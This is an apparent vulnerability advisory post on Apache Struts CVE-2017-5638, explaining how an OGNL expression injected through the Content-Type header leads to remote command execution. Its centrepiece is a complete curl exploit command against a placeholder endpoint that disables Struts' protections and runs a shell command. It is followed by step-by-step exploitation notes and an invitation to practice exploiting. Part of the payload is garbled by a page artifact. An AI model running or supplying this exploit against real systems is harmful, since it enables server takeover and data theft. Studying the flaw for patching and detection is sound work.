Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The vulnerability exists in the Jakarta Multipart parser in Apache Struts 2. An attacker can exploit this by sending a malicious `Content-Type` header in an HTTP request to a vulnerable Struts endpoint. If the header value is not properly sanitized, the flawed parser incorrectly interprets it as an OGNL expression. This allows for the injection and execution of arbitrary Object-Graph Navigation Language code on the server. The attacker’s OGNL code is then evaluated with the application’s privileges, leading to full system command execution. The root cause is the exception handler which passes the corrupted header value directly into an error message, where it is interpreted as an expression.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://vulnerable-server.com/struts2-endpoint`

How Exploit:

Craft malicious Content-Type header.

Send HTTP request.

Server executes OGNL.

Gains remote shell.

Protection from this CVE:

Upgrade Struts immediately.

Apply official patch.

Use input validation filters.

Impact:

Full server compromise.

Arbitrary command execution.

Complete system access.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top